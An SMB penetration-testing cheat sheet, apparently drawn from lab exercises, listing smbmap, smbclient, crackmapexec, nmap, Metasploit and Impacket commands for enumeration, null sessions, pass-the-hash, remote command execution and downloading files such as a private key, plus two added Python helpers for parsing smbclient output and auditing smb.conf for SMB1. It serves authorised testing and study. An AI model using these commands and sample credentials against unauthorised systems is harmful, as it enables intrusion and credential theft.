# 139/445 - SMB

## Find version

Find the SMB version using Metasploit: start `msfconsole`, then inside the console:

`use scanner/smb/smb_version`

Using nmap scripts (`unsafe=1` permits checks that can crash the target service, so omit it against hosts that must not be disrupted):

`nmap --script=smb-enum* --script-args=unsafe=1 -T5 [ip]`

## Discover shares

**smbmap:**

`smbmap -H [ip]`

or

`smbmap -H [ip] -d [domain] -u [user] -p [password]`

**smbclient:**

`smbclient //IP/Share`

or

`smbclient -L //$TARGET`

**Nmap:**

`nmap --script smb-enum-shares -p139,445 -T4 -Pn [ip]`

## Connect to share

**smbmap**:

`$ python smbmap.py -H 172.16.0.24 -u Administrator -p 'changeMe' -r 'C$\Users'`

**smbclient:**

`smbclient //$ip/share -U username`

or

`smbclient \\\\{IP}\\Share`

## Connect to the host

**Crackmapexec:**

`crackmapexec smb -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183`

Using smbexec:

`crackmapexec smb --exec-method smbexec -d . -u Administrator -p 'pass123' -x "whoami" 192.168.204.183`

## Pass The Hash

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107`

or, with `-R` to list the shares recursively:

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 -R`

**Crackmapexec**:

`crackmapexec smb <target> -u username -H LMHASH:NTHASH`

## Null Session

smbmap:

`smbmap -H {IP}`

rpcclient:

`rpcclient -U "" -N {IP}`

crackmapexec:

`crackmapexec smb <target(s)> -u '' -p ''`

## Download files

**using smbmap:**

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk`

#### using smbget

`smbget -R smb://10.10.10.178/Secure$`

#### using smbclient

```
root@kali# smbclient -U TempUser //10.10.10.178/Secure$ welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  5 07:05:22 2020
  ..                                  D        0  Fri Jun  5 07:05:22 2020
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  IT                                  D        0  Thu Aug  8 06:59:25 2019

                10485247 blocks of size 4096. 6545925 blocks available
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \HR\*
NT_STATUS_ACCESS_DENIED listing \IT\*

```
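As an added example, not part of the original page: a small parser for the smbclient transcript format shown above. It turns `ls` entries and `NT_STATUS_*` refusals into structured results so a share review can record which listed directories the account could actually read; the transcript it runs over is constructed.

```python
import re
from datetime import datetime

# Constructed sample (not captured from a real host): smbclient output for "ls"
# then "recurse on; prompt off; mget *" on a share whose subfolders are
# visible by name but not readable.
SAMPLE_SESSION = """\
smb: \\> ls
  .                                   D        0  Fri Jun  5 07:05:22 2020
  Finance                             D        0  Wed Aug  7 15:40:13 2019
  HR                                  D        0  Wed Aug  7 19:08:11 2019
  Quarterly Report.docx               A    28416  Thu Aug  8 06:59:25 2019

                10485247 blocks of size 4096. 6545925 blocks available
smb: \\> mget *
NT_STATUS_ACCESS_DENIED listing \\Finance\\*
NT_STATUS_ACCESS_DENIED listing \\HR\\*
"""

# An "ls" entry: two leading spaces, a name (may contain spaces), DOS attribute
# letters, size in bytes and a ctime-style timestamp.
ENTRY_RE = re.compile(
    r"^  (?P<name>.+?)\s+(?P<attrs>[A-Z]+)\s+(?P<size>\d+)\s+"
    r"(?P<mtime>[A-Z][a-z]{2} [A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4})$")
# A refused operation: NT status code, operation, path.
STATUS_RE = re.compile(r"^(?P<status>NT_STATUS_[A-Z_]+) (?P<op>\w+) (?P<path>\S+)$")

def parse_session(text):
    """Return (entries, failures). Each entry is a dict with name, is_dir,
    size and mtime; each failure is a (status, path) tuple."""
    entries, failures = [], []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m and m["name"] not in (".", ".."):   # skip self/parent entries
            entries.append({"name": m["name"], "is_dir": "D" in m["attrs"],
                            "size": int(m["size"]),
                            "mtime": datetime.strptime(m["mtime"], "%a %b %d %H:%M:%S %Y")})
        elif (m := STATUS_RE.match(line)):
            failures.append((m["status"], m["path"]))
    return entries, failures

def unreadable_dirs(text):
    """Listed directories whose contents were denied: the 'visible but not
    readable' pattern that shows which share ACLs are actually enforced."""
    entries, failures = parse_session(text)
    denied = {path.strip("\\").split("\\")[0]
              for status, path in failures if status == "NT_STATUS_ACCESS_DENIED"}
    return sorted(e["name"] for e in entries if e["is_dir"] and e["name"] in denied)
```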

## Check for vulnerabilities

Using nmap:

`nmap --script smb-vuln* -p139,445 -T4 -Pn [ip]`

## User Enumeration

Metasploit:

`use auxiliary/scanner/smb/smb_enumusers`

## Tools

### smbclient

`smbclient -L //$TARGET`

### smbmap

If we have a username and password:

`smbmap -u tyler -p '92g!mA8BGjOirkL%OG*&' -H 10.10.10.97`

The same username and password against a specific share, using smbclient (the share is a positional argument; smbclient has no `-H` option):

`smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' \\\\10.10.10.97\\new-site`

#### PassTheHash

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107`

**Download a file**

`smbmap -u alice1978 -p '0B186E661BBDBDCF6047784DE8B9FD8B:0B186E661BBDBDCF6047784DE8B9FD8B' -d hackthebox.htb -H 10.10.10.107 --download alice/my_private_key.ppk`

### Enum4Linux

Does everything in one script:

`enum4linux -a 10.0.0.1`

### Nmap

SMB enumeration using all scripts:

`nmap --script=smb-enum* --script-args=unsafe=1 -T5 [ip]`

### Metasploit

Find the SMB version (inside `msfconsole`):

`use scanner/smb/smb_version`

Enum users:

`use auxiliary/scanner/smb/smb_enumusers`

### Impacket samrdump.py

samrdump.py retrieves account information from the specified target through the Security Account Manager (SAM), a remote interface exposed under the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) service. It lists out the system shares, user accounts and other useful information about the target's presence in the local network. Its output shows all the user accounts held by the remote machine; inspecting the available shares for sensitive data and the other user accounts can reveal further valuable information.

**Syntax:**

`samrdump.py [domain]/[user]:[Password/Password Hash]@[Target IP Address]`

**Command:**

`samrdump.py ignite/Administrator:Ignite@987@192.168.1.105`

## Protocol Mismatch

When the following error is observed:

```
root@kali# smbclient -N //10.10.10.3/tmp 
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
```

For security reasons the client is configured not to negotiate older SMB dialects, so a server that only speaks SMB1 (NT1) drops the connection during protocol negotiation.

Allowing NT1 for this one connection lets us connect:

```
root@kali# smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1' 
Anonymous login successful 
Try "help" to get a list of possible comman
```

To make the change permanent, add the following lines to /etc/samba/smb.conf (this lowers the minimum dialect for every client connection, so prefer the per-command `--option` where possible):

```
[global] 
client min protocol=NT1 
```
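As an added check, not part of the original page: a parser that audits the `[global]` section of an smb.conf for whether `client min protocol` or `server min protocol` still admits an SMB1 dialect, contrasting the permissive setting above with a hardened one. The two config samples are constructed, and the assumed default when a key is absent is Samba's `SMB2_02`.

```python
import re

# Samba dialect names in negotiation order; aliases map to the dialect they
# select. Everything at or below NT1 is an SMB1 dialect.
DIALECT_RANK = {"CORE": 0, "COREPLUS": 1, "LANMAN1": 2, "LANMAN2": 3, "NT1": 4,
                "SMB2_02": 5, "SMB2_10": 6, "SMB2": 6,
                "SMB3_00": 7, "SMB3_02": 8, "SMB3_11": 9, "SMB3": 9}
SMB1_CEILING = DIALECT_RANK["NT1"]
DEFAULT_MIN = "SMB2_02"   # assumed default (Samba 4.11 and later) when the key is absent

# Constructed samples: the permissive change from the page, and the same file
# with the minimum kept at SMB2 on both the client and the server side.
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   ; lowered to reach a legacy host that only speaks SMB1
   client min protocol = NT1
"""
HARDENED_CONF = """\
[global]
   workgroup = WORKGROUP
   client min protocol = SMB2_02
   server min protocol = SMB2_02
"""

def parse_global(conf):
    """Return the [global] section as {normalised key: value}. Samba ignores
    case and whitespace in parameter names and skips lines starting ';' or '#'."""
    params, section = {}, None
    for raw in conf.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "global" and "=" in line:
            key, value = line.split("=", 1)
            params[re.sub(r"\s+", "", key).lower()] = value.strip()
    return params

def smb1_permitted(conf):
    """For the client and server side, say whether the configured minimum
    protocol still lets an SMB1 dialect be negotiated."""
    params = parse_global(conf)
    verdict = {}
    for side in ("client", "server"):
        name = params.get(side + "minprotocol", DEFAULT_MIN).upper()
        if name not in DIALECT_RANK:
            raise ValueError(f"unknown dialect {name!r} in {side} min protocol")
        verdict[side] = DIALECT_RANK[name] <= SMB1_CEILING
    return verdict
```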

## Resources

<https://docs.google.com/spreadsheets/d/1F9wUdEJv22HdqhSn6hy-QVtS7eumgZWYYrD-OSi6JOc/edit#gid=2080645025>

